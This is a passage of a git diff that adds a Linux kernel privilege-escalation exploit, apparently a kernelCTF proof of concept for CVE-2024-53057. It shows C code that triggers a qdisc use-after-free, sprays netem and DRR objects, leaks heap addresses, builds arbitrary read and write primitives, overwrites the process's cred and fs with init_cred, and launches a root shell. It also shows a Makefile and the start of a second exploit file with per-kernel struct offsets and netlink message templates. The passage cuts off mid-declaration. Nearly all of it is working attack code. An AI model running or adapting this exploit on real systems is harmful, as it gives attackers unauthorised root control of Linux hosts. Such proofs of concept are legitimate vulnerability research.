if (recv(inet_sock_fd, &msgbuf, 1, MSG_DONTWAIT) != -1) { + target = drr_spray[i]; + printf("[+] Found target DRR class %x\n", target); + continue; + } + tc_del_fl(drr_spray[i]); + } + tc_del_cl(drr_spray[i]); + } + + if (!target) + printf("[-] DRR spray on %x failed\n", parent); + + return target; +} + +int add_qdisc_timer_node (int parent, int root, int *spray_handles, + int spray_hash, int label, int ns_outer, int ns_inner) { + + /* Handles of the current leaf of the three branches, 
and handle of tbf qdisc's parent */ + int b1, b2, b3, pin, tbfp; + + switch_ns(ns_outer); + + /* Add subtree root */ + hfsc_qdisc_msg.def = 1; + tc_add_qd(&hfsc_qdisc_msg, parent, root); + + /* Set up upper layers */ + b1 = tc_add_cl(&rsc_class_msg, root, 1); + b1 = tc_add_qd(&drr_qdisc_msg, b1, 0xffff0000); + pin = tc_add_cl(&drr_class_msg, b1, 2); + b1 = tc_add_cl(&drr_class_msg, b1, 1); + + switch_ns(ns_inner); + b2 = tc_add_qd(&drr_qdisc_msg, -1, root + 0x30000); + switch_ns(ns_outer); + + b3 = tc_add_cl(&fsc_class_msg, root, 3); + b3 = tc_add_qd(&drr_qdisc_msg, b3, root + 0x40000); + tc_add_fl(&basic_filter_msg, b3 | 1); + + /* Create dangling pointer above TBF qdisc */ + tc_add_fl(&basic_filter_msg, b1); + trigger_vuln(b1); + + tc_del_fl(b1); + tc_add_fl(&basic_filter_msg, pin); + trigger_vuln(pin); + + hfsc_qdisc_msg.def = 3; + tc_add_qd(&hfsc_qdisc_msg, parent, root); + + tc_del_cl(b1); // Create dangling pointer + switch_ns(ns_inner); + tbfp = tc_add_cl(&drr_class_msg, b2, 1); + + /* Spray to prevent a later allocation + accidentally going under the dangling pointer + in case the allocation above missed it */ + for (int i = 1; i < DRR_SPRAY; i++) + tc_add_cl(&drr_class_msg, b2, i + 1); + tc_add_fl(&basic_filter_msg, tbfp); + + /* Add TBF qdisc */ + b2 = tc_add_qd(&tbf_qdisc_msg, tbfp, root + 0x50000); + b2 = tc_add_qd(&drr_qdisc_msg, b2, 0xffff0000); + tc_add_fl(&basic_filter_msg, b2 | 1); + + /* Create dangling pointer under TBF qdisc */ + b2 = tc_add_cl(&drr_class_msg, b2, 1); + + trigger_vuln(b2); + + tc_del_fl(tbfp); + tc_del_cl(b2); // Create dangling pointer + switch_ns(ns_outer); + b3 = drr_spray_and_find(b3); + + if (!b3) { + tc_del_qd(-1); + switch_ns(ns_inner); + tc_del_qd(-1); + switch_ns(ns_outer); + return 1; + } + + + switch_ns(ns_inner); + + for (int i = 0; i < clog_len; i++) + tc_add_cl(&drr_class_msg, 0xffff0000, i + 2); + + tc_add_qd(&stall_tbf_qdisc_msg, tbfp, 0); + + switch_ns(ns_outer); + + /* Choose netem handles */ + for (int i = 
0x10000000, j = 0; j < NETEM_SPRAY; i += 0x10000) { + if (QDISC_HASH(i) == spray_hash) + spray_handles[j++] = i; + } + + /* Wait for previously deleted qdiscs to be freed */ + printf("[*] Adding qdisc timer node %d\n", label); + if (membarrier(MEMBARRIER_CMD_GLOBAL, 0) == -1) + err_exit("[-] membarrier"); + + /* Destroy TBF qdisc */ + switch_ns(ns_inner); + tc_del_cl(tbfp); + switch_ns(ns_outer); + + /* Set timer on TBF qdisc */ + if (sendto(inet_sock_fd, &msgbuf, LABEL_TO_VALUE(label), 0, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] sendto"); + + /* Wait for TBF qdisc to be freed */ + if (membarrier(MEMBARRIER_CMD_GLOBAL, 0) == -1) + err_exit("[-] membarrier"); + + /* Spray netem qdiscs */ + for (int i = 0; i < NETEM_SPRAY; i++) + b3 = tc_add_qd(&parms_netem_qdisc_msg, b3, spray_handles[i]); + + return 0; +} + +int main (int argc, char **argv) { + + if (argc > 1) { + clog_len = atoi(argv[1]); + } else { + clog_len = CLOG_LEN; + } + + if (unshare(CLONE_NEWUSER) == -1) + err_exit("[-] unshare(CLONE_NEWUSER)"); + + for (int i = 0; i < 4; i++) { + if (unshare(CLONE_NEWNET) == -1) + err_exit("[-] unshare(CLONE_NEWNET)"); + + /* Open socket to send netlink commands to */ + nl_socks[i] = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (nl_socks[i] == -1) + err_exit("[-] nl socket"); + + /* Set lo up */ + if_up_msg.ifi.ifi_index = if_nametoindex("lo"); + netlink_write(nl_socks[i], &if_up_msg); + + /* Open inet sockets */ + iaddr.sin_family = AF_INET; + iaddr.sin_port = htons(1); + iaddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + inet_socks[i] = socket(PF_INET, SOCK_DGRAM, 0); + if (inet_socks[i] == -1) + err_exit("[-] inet socket"); + if (bind(inet_socks[i], &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] inet bind"); + } + + pin_cpu(0); + + /* Add timer nodes to tree */ + init_timers(); + add_neg_nodes(); + for (int i = 0; i < NUM_NODES - 2; i++) + add_timer_node(add_order[i]); + + /* Add dangling qdisc pointers to tree */ + int parent, n1, n2, 
netem_spray1[NETEM_SPRAY], netem_spray2[NETEM_SPRAY], enq_qd; + + switch_ns(1); + do { + hfsc_qdisc_msg.def = 1; + parent = tc_add_qd(&hfsc_qdisc_msg, -1, 0x150000); + parent = tc_add_cl(&fsc_class_msg, parent, 1); + } while (add_qdisc_timer_node(parent, 0x1000000, netem_spray1, 1, add_order[NUM_NODES - 2], 1, 3)); + + switch_ns(2); + do { + hfsc_qdisc_msg.def = 1; + parent = tc_add_qd(&hfsc_qdisc_msg, -1, 0x20000); + parent = tc_add_cl(&fsc_class_msg, parent, 1); + } while (add_qdisc_timer_node(parent, 0x2000000, netem_spray2, 2, add_order[NUM_NODES - 1], 2, 4)); + + /* Enqueue a packet at netem_spray[0] for later */ + switch_ns(2); + hfsc_qdisc_msg.def = 2; + tc_add_qd(&hfsc_qdisc_msg, 0, 0x20000); + parent = tc_add_cl(&rsc_class_msg, 0x20000, 2); + enq_qd = tc_add_qd(&delay_netem_qdisc_msg, parent, 0x2a0000); + loopback_send(); + + + /* Leak heap addresses of attacker netem qdiscs by removing 15 */ + + long n1_base_kaddr, n1_parms_kaddr, n1_slot_kaddr, n2_base_kaddr, n2_parms_kaddr, n2_slot_kaddr; + long n1_parms_buf[7] = {}, n2_parms_buf[7] = {}; + long n1_slot_buf[5] = {}, n2_slot_buf[5] = {}; + + rm_timer_node(15); + + switch_ns(1); + n1 = -1; + for (int i = 0; i < NETEM_SPRAY; i++) { + read_netem_parms(netem_spray1[i], n1_parms_buf); + if (n1_parms_buf[0]) { + n1 = netem_spray1[i]; + break; + } + } + + switch_ns(2); + n2 = -1; + for (int i = 0; i < NETEM_SPRAY; i++) { + read_netem_parms(netem_spray2[i], n2_parms_buf); + if (n2_parms_buf[0]) { + n2 = netem_spray2[i]; + break; + } + } + if (n1 == -1 || n2 == -1) { + printf("[-] Heap address leak failed: n1 = %x, n2 = %x\n", n1, n2); + exit(EXIT_FAILURE); + } + + if (NETEM_SPRAY > 1) { + switch_ns(1); + tc_del_qd(n1); + switch_ns(2); + tc_del_qd(n2); + } + + + n2_parms_kaddr = n1_parms_buf[0]; + n2_base_kaddr = n2_parms_kaddr & ~1023; + n2_slot_kaddr = n2_base_kaddr + PRIVDATA_OFF + SLOT_CONFIG_OFF; + + n1_parms_kaddr = n2_parms_buf[2]; + n1_base_kaddr = n1_parms_kaddr & ~1023; + n1_slot_kaddr = n1_base_kaddr + 
PRIVDATA_OFF + SLOT_CONFIG_OFF; + + printf("[+] Found qdiscs: n1 handle = %x, n1 addr = %p\n" + " n2 handle = %x, n2 addr = %p\n", + n1, n1_base_kaddr, n2, n2_base_kaddr); + + + /* Overwrite n2->slot_dist by removing 13 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (s) (c) + \ + (c) + + y is at &n2->latency + */ + + n2_parms_buf[2] = n1_parms_kaddr + 32; // y->rb_left = s = &n1->latency + 32 + n1_parms_buf[5] = n2_base_kaddr + PRIVDATA_OFF + SLOT_DIST_OFF; // s->rb_right = &n2->slot_dist + n1_parms_buf[6] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + switch_ns(2); + write_netem_parms(n2, n2_parms_buf, n2_slot_buf); + + rm_timer_node(13); + + /* Overwrite n2->hash.next by removing 11 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (p) (p) + / / + (s) (c) + \ + (c) + + y is at &n1->latency + 32 + */ + + n1_parms_buf[6] = n2_parms_kaddr + 32; // y->rb_left = p = &n2->latency + 32 + n2_parms_buf[6] = n1_slot_kaddr + 8; // p->rb_left = s = &n1->slot + 8 + n1_slot_buf[2] = n2_base_kaddr + 40; // s->rb_right = c = &n2->hash.next + n1_slot_buf[3] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + switch_ns(2); + write_netem_parms(n2, n2_parms_buf, n2_slot_buf); + rm_timer_node(11); + + /* Set up arbitrary read */ + setup_stab_read(n2, n2_parms_kaddr, n2_slot_kaddr, 2); + + printf("[*] Arbitrary read set up\n"); + + /* Overwrite root qdisc's vt_tree by removing 9 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (p) (p) + / / + (s) (c) + \ + (c) + + y is at &n1->slot + 8 + */ + + long root_qdisc_kaddr, netdevq_kaddr; + + netdevq_kaddr = stab_read_8(n1_base_kaddr + NETDEV_OFF); + root_qdisc_kaddr = stab_read_8(netdevq_kaddr + ROOT_QDISC_OFF); + + n1_slot_buf[3] = n1_parms_kaddr - 16; // y->rb_left = &n1->latency - 16 + n1_parms_buf[0] = n1_parms_kaddr + 32; // p->rb_left = &n1->latency + 32 + n1_parms_buf[5] = 
root_qdisc_kaddr + PRIVDATA_OFF + ROOT_OFF + + VT_TREE_OFF; // s->rb_right = &root_qdisc->privdata.root.vt_tree + n1_parms_buf[6] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + + rm_timer_node(9); + + /* Set up vt_node write primitive */ + setup_vt_write(n1, n1_base_kaddr, 1); + + printf("[*] Write-what-where set up\n"); + + /* Set f_owner pointer in socket file */ + if (fcntl(inet_socks[1], F_SETOWN, getpid()) == -1) + err_exit("[-] fcntl"); + + /* Read kernel pointers */ + long task_kaddr, init_task_kaddr, init_cred_kaddr, init_fs_kaddr; + long next_addr; + + printf("[*] Getting kernel pointers\n"); + + netdevq_kaddr = stab_read_8(n2_base_kaddr + NETDEV_OFF); + next_addr = handle_to_kaddr(enq_qd, netdevq_kaddr); + + next_addr = stab_read_8(next_addr + PRIVDATA_OFF + T_HEAD_OFF); + next_addr = stab_read_8(next_addr + SK_OFF); + next_addr = stab_read_8(next_addr + SOCK_OFF); + next_addr = stab_read_8(next_addr + FILE_OFF); + next_addr = stab_read_8(next_addr + F_OWNER_OFF + PID_OFF); + next_addr = stab_read_8(next_addr + TASKS_OFF); + task_kaddr = next_addr -= PID_LINKS_OFF; + + do { + init_task_kaddr = next_addr; + next_addr = stab_read_8(next_addr + REAL_PARENT_OFF); + } while (next_addr != init_task_kaddr); + + init_cred_kaddr = stab_read_8(init_task_kaddr + CRED_OFF); + init_fs_kaddr = stab_read_8(init_task_kaddr + FS_OFF); + + printf("[+] task: %p, init_cred: %p, init_fs: %p\n", + task_kaddr, init_cred_kaddr, init_fs_kaddr); + + printf("[*] Overwriting cred and fs\n"); + + /* LPE */ + vt_write_8(task_kaddr + FS_OFF, init_fs_kaddr); + vt_write_8(task_kaddr + CRED_OFF, init_cred_kaddr); + + if (getuid()) { + printf("[-] Privesc failed\n"); + exit(EXIT_FAILURE); + } + + printf("[*] Launching shell\n"); + system("/bin/sh"); + return 0; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/Makefile 
b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/Makefile new file mode 100644 index 000000000..1275cd02e --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/Makefile @@ -0,0 +1,7 @@ +CFLAGS = -Wno-incompatible-pointer-types -Wno-format -Wno-address-of-packed-member -static -D LTS + +exploit: exploit.c + gcc $(CFLAGS) -o $@ $< + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/exploit b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/exploit new file mode 100644 index 000000000..019dc7b9b Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/exploit.c b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/exploit.c new file mode 100644 index 000000000..e3e8e4820 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/exploit.c @@ -0,0 +1,1465 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#if defined(MITIGATION) || defined(COS) + +/* Kernel object offsets */ +#define HANDLE_OFF 56 // offsetof(struct Qdisc, handle) +#define NETDEV_OFF 64 // offsetof(struct Qdisc, dev_queue) +#define PRIVDATA_OFF 384 // offsetof(struct Qdisc, privdata) +#define T_HEAD_OFF 8 // offsetof(struct netem_sched_data, t_head) +#define SLOT_CONFIG_OFF 280 // offsetof(struct netem_sched_data, slot_config) +#define SLOT_DIST_OFF 336 // offsetof(struct netem_sched_data, disttable) +#define TABLE_OFF 4 // offsetof(struct disttable, table) +#define ROOT_OFF 16 // offsetof(struct hfsc_sched, root) +#define LEVEL_OFF 100 // offsetof(struct 
hfsc_class, level) +#define PARENT_OFF 112 // offsetof (struct hfsc_class, cl_parent) +#define CL_VT_OFF 280 // offsetof(struct hfsc_class, cl_vt) +#define CL_CVTMIN_OFF 312 // offsetof(struct hfsc_class, cl_cvtmin) +#define VT_TREE_OFF 184 // offsetof(struct hfsc_class, vt_tree) +#define VT_NODE_OFF 192 // offsetof(struct hfsc_class, vt_node) +#define ROOT_QDISC_OFF 8 // offsetof(struct netdev_queue, qdisc) +#define NET_DEVICE_OFF 0 // offsetof(struct netdev_queue, dev) +#define QDISC_HASH_TABLE_OFF 968 // offsetof(struct net_device, qdisc_hash) +#define IFINDEX_OFF 216 // offsetof(struct net_device, ifindex) +#define QDISC_HLIST_OFF 40 // offsetof(struct Qdisc, hash) +#define SK_OFF 24 // offsetof(struct sk_buff, sk) +#define SOCK_OFF 624 // offsetof(struct sock, sk_socket) +#define FILE_OFF 16 // offsetof(struct socket, file) +#define F_OWNER_OFF 112 // offsetof(struct file, f_owner) +#define PID_OFF 8 // offsetof(struct fown_struct, pid) +#define TASKS_OFF 16 // offsetof(struct pid, tasks) +#define PID_LINKS_OFF 1632 // offsetof(struct task_struct, pid_links) +#define REAL_PARENT_OFF 1536 // offsetof(struct task_struct, real_parent) +#define CRED_OFF 2008 // offsetof(struct task_struct, cred) +#define FS_OFF 2088 // offsetof(struct task_struct, fs) + +/* Offset of stab in dump message */ +#define STAB_OFF 40 + +/* Offset of fake HFSC class in disttable */ +#define HFSC_CLASS_START 4 + +/* Increases race window */ +#define CLOG_LEN 1000 + +#elif defined(LTS) + +/* Kernel object offsets */ +#define HANDLE_OFF 56 // offsetof(struct Qdisc, handle) +#define NETDEV_OFF 64 // offsetof(struct Qdisc, dev_queue) +#define PRIVDATA_OFF 384 // offsetof(struct Qdisc, privdata) +#define T_HEAD_OFF 8 // offsetof(struct netem_sched_data, t_head) +#define SLOT_CONFIG_OFF 296 // offsetof(struct netem_sched_data, slot_config) +#define SLOT_DIST_OFF 352 // offsetof(struct netem_sched_data, disttable) +#define TABLE_OFF 4 // offsetof(struct disttable, table) +#define ROOT_OFF 16 // 
offsetof(struct hfsc_sched, root) +#define LEVEL_OFF 96 // offsetof(struct hfsc_class, level) +#define PARENT_OFF 112 // offsetof (struct hfsc_class, cl_parent) +#define CL_VT_OFF 280 // offsetof(struct hfsc_class, cl_vt) +#define CL_CVTMIN_OFF 312 // offsetof(struct hfsc_class, cl_cvtmin) +#define VT_TREE_OFF 184 // offsetof(struct hfsc_class, vt_tree) +#define VT_NODE_OFF 192 // offsetof(struct hfsc_class, vt_node) +#define ROOT_QDISC_OFF 8 // offsetof(struct netdev_queue, qdisc) +#define NET_DEVICE_OFF 0 // offsetof(struct netdev_queue, dev) +#define QDISC_HASH_TABLE_OFF 1032 // offsetof(struct net_device, qdisc_hash) +#define IFINDEX_OFF 224 // offsetof(struct net_device, ifindex) +#define QDISC_HLIST_OFF 40 // offsetof(struct Qdisc, hash) +#define SK_OFF 24 // offsetof(struct sk_buff, sk) +#define SOCK_OFF 624 // offsetof(struct sock, sk_socket) +#define FILE_OFF 16 // offsetof(struct socket, file) +#define F_OWNER_OFF 80 // offsetof(struct file, f_owner) +#define PID_OFF 8 // offsetof(struct fown_struct, pid) +#define TASKS_OFF 16 // offsetof(struct pid, tasks) +#define PID_LINKS_OFF 1608 // offsetof(struct task_struct, pid_links) +#define REAL_PARENT_OFF 1512 // offsetof(struct task_struct, real_parent) +#define CRED_OFF 1984 // offsetof(struct task_struct, cred) +#define FS_OFF 2064 // offsetof(struct task_struct, fs) + +/* Offset of stab in dump message */ +#define STAB_OFF 48 + +/* Offset of fake HFSC class in disttable */ +#define HFSC_CLASS_START 4 + +/* Increases race window */ +#define CLOG_LEN 0 + +#endif + +/* Traffic control handles */ +#define VULN_NETEM_HANDLE 0xdead0000 + +/* Size of disttable */ +#define DIST_SIZE 1020 + +#define TIMER_BASE 50000 +#define TIMER_INC 100 +#define LABEL_TO_VALUE(x) (TIMER_BASE + TIMER_INC*x) + +#define DRR_SPRAY 36 +#define NETEM_SPRAY 20 + +#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0) + +int clog_len; +int curr_ns; +unsigned char msgbuf[65536]; + +/* Netlink Messages */ + +/* Traffic control 
message header */ +struct __attribute__((packed)) tf_msg { + struct nlmsghdr nh; + struct tcmsg tm; +}; + +/* Network interface message header */ +struct __attribute__((packed)) if_msg { + struct nlmsghdr nh; + struct ifinfomsg ifi; +}; + +/* Set network interface up */ +struct if_msg if_up_msg = { + { + .nlmsg_len = 32, + .nlmsg_type = RTM_NEWLINK, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .ifi_family = AF_UNSPEC, + .ifi_type = ARPHRD_NETROM, + .ifi_flags = IFF_UP, + .ifi_change = 1, + }, + +}; + +/* Add/modify an HFSC qdisc */ +struct __attribute__((packed)) hfsc_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + int def; +}; + +struct hfsc_qdisc_msg hfsc_qdisc_msg = { + { + .nlmsg_len = sizeof(struct hfsc_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 8, + .rta_type = TCA_OPTIONS, + }, +}; + +/* Add/modify an RSC HFSC class */ +struct __attribute__((packed)) rsc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr rsc_hdr; + struct tc_service_curve rsc; +}; + +struct rsc_class_msg rsc_class_msg = { + { + .nlmsg_len = sizeof(struct rsc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = { + .rta_len = 20, + .rta_type = TCA_OPTIONS, + }, + .rsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_RSC, + }, + .rsc = { + .m1 = 1, + .d= 1, + }, +}; + +/* Add/modify an FSC HFSC class */ +struct __attribute__((packed)) fsc_class_msg { + 
struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr fsc_hdr; + struct tc_service_curve fsc; +}; + +struct fsc_class_msg fsc_class_msg = { + { + .nlmsg_len = sizeof(struct fsc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 20, + .rta_type = TCA_OPTIONS, + }, + .fsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_FSC, + }, + .fsc = { + .m1 = 1, + .d= 1, + }, +}; + +/* Add/modify an USC HFSC class */ +struct __attribute__((packed)) usc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr fsc_hdr; + struct tc_service_curve fsc; + struct rtattr usc_hdr; + struct tc_service_curve usc; +}; + +struct usc_class_msg usc_class_msg = { + { + .nlmsg_len = sizeof(struct usc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 36, + .rta_type = TCA_OPTIONS, + }, + .fsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_FSC, + }, + .fsc = { + .m2 = 1, + }, + .usc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_USC, + }, + .usc = { + .m2 = 1, + }, +}; + +/* Add/modify a DRR qdisc */ +struct __attribute__((packed)) drr_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; +}; + +struct drr_qdisc_msg drr_qdisc_msg = { + { + .nlmsg_len = sizeof(struct drr_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + 
.tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "drr", +}; + +struct __attribute__((packed)) drr_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr quantum_hdr; + int quantum; +}; + +/* Add/modify a DRR class */ +struct drr_class_msg drr_class_msg = { + { + .nlmsg_len = sizeof(struct drr_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "drr", + .options_hdr = { + .rta_len = 12, + .rta_type = TCA_OPTIONS, + }, + .quantum_hdr = { + .rta_len = 8, + .rta_type = TCA_DRR_QUANTUM, + }, + .quantum = 65536, +}; + +/* Add/modify a TBF qdisc to let packets through */ +struct __attribute__((packed)) tbf_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr qopt_hdr; + struct tc_tbf_qopt qopt; +}; + +struct tbf_qdisc_msg tbf_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tbf_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "tbf", + .options_hdr = { + .rta_len = 44, + .rta_type = TCA_OPTIONS, + }, + .qopt_hdr = { + .rta_len = 40, + .rta_type = TCA_TBF_PARMS, + }, + .qopt = { + .limit = 65536, + .buffer = 65536, + .rate = { + .linklayer = TC_LINKLAYER_ETHERNET, + .rate = 1000000000, + }, + }, +}; + +/* Add/modify a TBF qdisc to wait for pkt_len-1 secs */ +struct __attribute__((packed)) stall_tbf_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr qopt_hdr; + struct tc_tbf_qopt 
qopt; + struct rtattr burst_hdr; + int burst; +}; + +struct stall_tbf_qdisc_msg stall_tbf_qdisc_msg = { + { + .nlmsg_len = sizeof(struct stall_tbf_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "tbf", + .options_hdr = { + .rta_len = 52, + .rta_type = TCA_OPTIONS, + }, + .qopt_hdr = { + .rta_len = 40, + .rta_type = TCA_TBF_PARMS, + }, + .qopt = { + .limit = 65536, + .rate = { + .linklayer = TC_LINKLAYER_ETHERNET, + .rate = 1, + }, + }, + .burst_hdr = { + .rta_len = 8, + .rta_type = TCA_TBF_BURST, + }, + .burst = 1, +}; + + +/* Add/modify a netem qdisc to delay the packet */ +struct __attribute__((packed)) delay_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; +}; + +struct delay_netem_qdisc_msg delay_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct delay_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = + { + .rta_len = 28, + .rta_type = TCA_OPTIONS, + }, + .qopt = { + .limit = 65536, + .latency = -1, + } +}; + +/* Add/modify a netem qdisc with many parameters. 
Used for type confusion */ +struct __attribute__((packed)) parms_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; + struct rtattr ecn_hdr; + int ecn; + struct rtattr latency_hdr; + long latency; + struct rtattr jitter_hdr; + long jitter; + struct rtattr reorder_hdr; + struct tc_netem_reorder reorder; + struct rtattr corrupt_hdr; + struct tc_netem_corrupt corrupt; + struct rtattr rate_hdr; + struct tc_netem_rate rate; + struct rtattr rate64_hdr; + long rate64; + struct rtattr slot_hdr; + struct tc_netem_slot slot; +}; + +struct parms_netem_qdisc_msg parms_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct parms_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = { + .rta_len = 160, + .rta_type = TCA_OPTIONS, + }, + .qopt = { + .limit = 65536, + }, + .ecn_hdr = { + .rta_len = 8, + .rta_type = TCA_NETEM_ECN, + }, + .latency_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_LATENCY64, + }, + .jitter_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_JITTER64, + }, + .reorder_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_REORDER, + }, + .corrupt_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_CORRUPT, + }, + .rate64_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_RATE64, + }, + .rate_hdr = { + .rta_len = 20, + .rta_type = TCA_NETEM_RATE, + }, + .slot_hdr = { + .rta_len = 44, + .rta_type = TCA_NETEM_SLOT, + }, +}; + +/* Add/modify a netem qdisc with a slot_dist buffer */ +struct __attribute__((packed)) dist_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; + struct rtattr dist_hdr; + char dist[DIST_SIZE]; +}; + +struct 
